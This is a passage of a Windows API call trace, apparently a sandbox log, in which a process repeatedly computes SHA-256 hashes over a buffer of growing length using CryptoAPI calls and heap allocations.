	[0253.209] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5580
	[0253.209] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5580, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5580, pdwDataLen=0x128c3c) returned 1
	[0253.209] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.209] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.209] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.209] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.209] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0253.209] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.209] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c55a8
	[0253.209] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c55a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c55a8, pdwDataLen=0x128c3c) returned 1
	[0253.209] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.209] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.209] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.210] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.210] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0253.210] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c55d0
	[0253.210] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c55d0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c55d0, pdwDataLen=0x128c3c) returned 1
	[0253.210] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.210] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.210] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.210] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.210] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0253.210] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.210] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c55f8
	[0253.210] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c55f8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c55f8, pdwDataLen=0x128c3c) returned 1
	[0253.210] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.210] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.210] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.211] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.211] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0253.211] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.211] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5620
	[0253.211] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5620, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5620, pdwDataLen=0x128c3c) returned 1
	[0253.211] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.211] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.211] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.211] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.211] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0253.211] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.211] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5648
	[0253.211] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5648, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5648, pdwDataLen=0x128c3c) returned 1
	[0253.211] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.211] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.211] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.212] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.212] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0253.212] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.212] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5670
	[0253.212] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5670, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5670, pdwDataLen=0x128c3c) returned 1
	[0253.212] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.212] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.212] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.212] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.212] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0253.212] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.212] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5698
	[0253.212] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5698, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5698, pdwDataLen=0x128c3c) returned 1
	[0253.212] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.212] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.212] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.213] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.213] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0253.213] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c56c0
	[0253.213] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c56c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c56c0, pdwDataLen=0x128c3c) returned 1
	[0253.213] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.213] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.213] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.213] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.213] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0253.213] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c56e8
	[0253.213] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c56e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c56e8, pdwDataLen=0x128c3c) returned 1
	[0253.213] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.213] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.213] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.214] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.214] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0253.214] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.214] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5710
	[0253.214] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5710, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5710, pdwDataLen=0x128c3c) returned 1
	[0253.214] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.214] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.214] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.214] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.214] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0253.214] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.214] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5738
	[0253.214] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5738, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5738, pdwDataLen=0x128c3c) returned 1
	[0253.214] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.214] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.214] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.215] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.215] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0253.215] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.215] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5760
	[0253.215] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5760, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5760, pdwDataLen=0x128c3c) returned 1
	[0253.215] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.215] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.215] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.215] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.215] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0253.215] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.215] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5788
	[0253.215] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5788, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5788, pdwDataLen=0x128c3c) returned 1
	[0253.215] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.215] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.215] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.216] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.216] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0253.216] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.216] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c57b0
	[0253.216] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c57b0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c57b0, pdwDataLen=0x128c3c) returned 1
	[0253.216] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.216] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.216] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.216] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.216] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0253.216] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.216] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c57d8
	[0253.216] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c57d8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c57d8, pdwDataLen=0x128c3c) returned 1
	[0253.216] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.216] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.216] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.217] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.217] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0253.217] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.217] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5800
	[0253.217] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5800, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5800, pdwDataLen=0x128c3c) returned 1
	[0253.217] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.217] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.217] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.217] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.217] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0253.217] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.217] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5828
	[0253.217] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5828, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5828, pdwDataLen=0x128c3c) returned 1
	[0253.217] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.217] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.217] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.218] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.218] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0253.218] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.218] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5850
	[0253.218] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5850, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5850, pdwDataLen=0x128c3c) returned 1
	[0253.218] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.218] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.218] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.218] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.218] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0253.218] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.218] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5878
	[0253.218] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5878, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5878, pdwDataLen=0x128c3c) returned 1
	[0253.218] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.218] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.218] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.219] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.219] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0253.219] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.219] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c58a0
	[0253.219] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c58a0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c58a0, pdwDataLen=0x128c3c) returned 1
	[0253.219] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.219] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.219] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.219] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.219] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0253.219] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.219] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c58c8
	[0253.219] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c58c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c58c8, pdwDataLen=0x128c3c) returned 1
	[0253.219] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.219] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.219] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.220] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.220] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0253.220] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c58f0
	[0253.220] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c58f0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c58f0, pdwDataLen=0x128c3c) returned 1
	[0253.220] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.220] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.220] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.220] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.220] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0253.220] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.220] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5918
	[0253.220] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5918, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5918, pdwDataLen=0x128c3c) returned 1
	[0253.220] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.220] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.220] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.221] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.221] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0253.221] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5940
	[0253.221] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5940, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5940, pdwDataLen=0x128c3c) returned 1
	[0253.221] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.221] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.221] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.221] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.221] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0253.221] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.221] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5968
